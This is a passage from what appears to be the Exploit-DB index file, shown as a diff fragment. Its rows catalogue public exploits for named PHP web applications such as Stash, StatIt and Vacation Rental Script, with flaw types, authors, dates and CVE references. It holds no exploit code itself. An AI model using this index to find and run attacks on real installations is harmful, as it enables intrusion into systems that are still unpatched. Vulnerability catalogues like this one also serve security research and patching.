6406,exploits/php/webapps/6406.txt,"Stash 1.0.3 - Insecure Cookie Handling",2008-09-09,Ciph3r,webapps,php,,2008-09-08,2016-12-23,1,OSVDB-48219;CVE-2008-4081,,,,http://www.exploit-db.comstash-1.0.3.tar.gz,
6402,exploits/php/webapps/6402.txt,"Stash 1.0.3 - Multiple SQL Injections",2008-09-09,"Khashayar Fereidani",webapps,php,,2008-09-08,2016-12-23,1,OSVDB-47995;CVE-2008-4080;OSVDB-47994,,,,http://www.exploit-db.comstash-1.0.3.tar.gz,
6714,exploits/php/webapps/6714.pl,"Stash 1.0.3 - SQL Injection User Credentials Disclosure",2008-10-09,gnix,webapps,php,,2008-10-08,2016-12-23,1,OSVDB-49170;CVE-2008-4590;OSVDB-49169,,,,http://www.exploit-db.comstash-1.0.3.tar.gz,
51602,exploits/php/webapps/51602.txt,"Statamic 4.7.0 - File-Inclusion",2023-07-19,nu11secur1ty,webapps,php,,2023-07-19,2023-07-19,0,,,,,,
11434,exploits/php/webapps/11434.txt,"statcountex 3.1 - Multiple Vulnerabilities",2010-02-13,Phenom,webapps,php,,2010-02-12,,1,OSVDB-62531;CVE-2010-0674;CVE-2008-0843,,,,http://www.exploit-db.comstatcountex-3.1.zip,
36499,exploits/php/webapps/36499.txt,"StatIt 4 - 'statistik.php' Multiple Cross-Site Scripting Vulnerabilities",2012-01-04,sonyy,webapps,php,,2012-01-04,2015-03-26,1,CVE-2012-5341;OSVDB-86238,,,,,https://www.securityfocus.com/bid/51280/info
1752,exploits/php/webapps/1752.pl,"StatIt 4 - 'statitpath' Remote File Inclusion",2006-05-05,IGNOR3,webapps,php,,2006-05-04,,1,OSVDB-25448;CVE-2006-2253,,,,,
@ -31315,6 +31331,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
6221,exploits/php/webapps/6221.txt,"Vacation Rental Script 3.0 - 'id' SQL Injection",2008-08-10,CraCkEr,webapps,php,,2008-08-09,2016-12-15,1,OSVDB-47372;CVE-2008-3603,,,,,
15793,exploits/php/webapps/15793.txt,"Vacation Rental Script 4.0 - Arbitrary File Upload",2010-12-20,Br0ly,webapps,php,,2010-12-20,2010-12-20,1,OSVDB-70019,,,,,
15828,exploits/php/webapps/15828.txt,"Vacation Rental Script 4.0 - Cross-Site Request Forgery",2010-12-25,OnurTURKESHAN,webapps,php,,2010-12-25,2010-12-26,0,,,,,http://www.exploit-db.comvacationrentalscript40.zip,
51596,exploits/php/webapps/51596.txt,"Vaidya-Mitra 1.0 - Multiple SQLi",2023-07-19,nu11secur1ty,webapps,php,,2023-07-19,2023-07-19,1,,,,,,
34535,exploits/php/webapps/34535.txt,"Valarsoft WebMatic 3.0.5 - Multiple HTML Injection Vulnerabilities",2010-08-26,"High-Tech Bridge SA",webapps,php,,2010-08-26,2014-09-05,1,,,,,,https://www.securityfocus.com/bid/42767/info
25301,exploits/php/webapps/25301.txt,"Valdersoft Shopping Cart 3.0 - Multiple Input Validation Vulnerabilities",2005-03-28,"Diabolic Crab",webapps,php,,2005-03-28,2013-05-08,1,,,,,,https://www.securityfocus.com/bid/12916/info
2964,exploits/php/webapps/2964.txt,"Valdersoft Shopping Cart 3.0 - Multiple Remote File Inclusions",2006-12-20,mdx,webapps,php,,2006-12-19,,1,OSVDB-32389;CVE-2006-6691,,,,,

Can't render this file because it is too large.